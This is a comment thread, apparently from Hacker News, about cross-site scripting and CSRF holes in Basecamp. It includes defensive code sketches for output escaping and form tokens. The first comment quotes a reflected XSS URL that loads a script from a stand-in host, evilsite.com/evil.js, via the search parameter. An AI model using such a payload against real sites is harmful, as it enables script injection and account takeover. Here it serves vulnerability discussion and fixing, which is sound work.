What's visible of the "evil" URL, at 1:52, looks like: http;//andyet.basecamphq.com/search?global=true&scope=all&terms=%3Cscript+src%3d%22http;//evilsite.com/evil.js... (: replaced with ; so news.YC doesn't shorten link)
This is a lack of filtering of a search input on the search page, not the bug they submitted - that one included injecting HTML/JS by logged in users onto "internal" pages. Conflating the two is disingenuous, at best.
The good news is that a fix for this vulnerability (filtering the search box's inputs) will take about 30 seconds for someone familiar with the code base and ~5 minutes for a brand new intern.
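For concreteness, here's a minimal sketch of what that fix looks like, assuming the results page echoes the query back into the HTML (the function name and template are hypothetical, not Basecamp's actual code):

```python
import html

def render_search_results(terms: str) -> str:
    """Echo the user's search terms back, HTML-escaped so injected
    markup like <script src="..."> renders as inert text instead of
    executing."""
    return f"<p>Results for: {html.escape(terms)}</p>"
```

Escaping on output like this neutralizes the reflected XSS in the URL above, since the payload comes straight from the `terms` query parameter.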
It will fix that one particular reflected XSS vulnerability, but from 37signals' response ("[their] users find great value in it") it sounds like they are allowing arbitrary HTML and JavaScript to run everywhere else on the site.
Other vulnerabilities would probably require a Basecamp account to be able to post messages to the site, but they allow privilege escalation and need to be fixed just the same.
37signals' response that users should be trusted is just stupid. Think of a customer logging into their vendor's Basecamp site, being able to take over the vendor's account, and then seeing all of the vendor's other customers.
Users (and their input) should never be trusted. Even if you trust the users, you can't always guarantee that the trusted user is the one in control of their web browser.
think of a customer logging into their vendor's basecamp site, being able to take over the vendor's account and then see all of their other customers.
Sounds like a customer I don't want. Money is great and all, but if a customer is going to hack my Basecamp account, then I don't want to work for them anymore.
I don't think "your users should be trusted" is a ridiculous way to look at things. Technology can't solve some problems.
Yeah... from personal experience, if an app is intentionally or unintentionally built without XSS or CSRF protection, a complete fix-up of a codebase as large as Basecamp's is pretty expensive. Granted, there are solutions that take care of 99% of the vulnerabilities, but the amount of testing/debugging/coding to close that 1% gap is huge.
Especially when you're still required to churn out new features in parallel.
Fixing CSRF is pretty formulaic. You can probably do it across your whole codebase using nothing but sed. Stick a copy of your session cookie as a hidden field in every HTML form, and validate it as the first step of every form processing routine. The only time you need to introduce anything more thoughtful is if in some cases cross-site requests really are a feature, e.g. API calls.
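A rough sketch of the token-in-every-form approach described above (the helper names are made up for illustration; real frameworks ship this built in):

```python
import hmac

def render_form(session_token: str, action: str) -> str:
    """Emit a form carrying the session token as a hidden field."""
    return (
        f'<form method="POST" action="{action}">'
        f'<input type="hidden" name="csrf_token" value="{session_token}">'
        '...</form>'
    )

def is_valid_request(session_token: str, submitted_token: str) -> bool:
    """First step of every form-processing routine: compare the hidden
    field against the session cookie. compare_digest avoids leaking
    the token through timing differences."""
    return hmac.compare_digest(session_token, submitted_token)
```

An attacker's cross-site form can't read the victim's session cookie, so it can't supply a matching `csrf_token` and the request is rejected at step one.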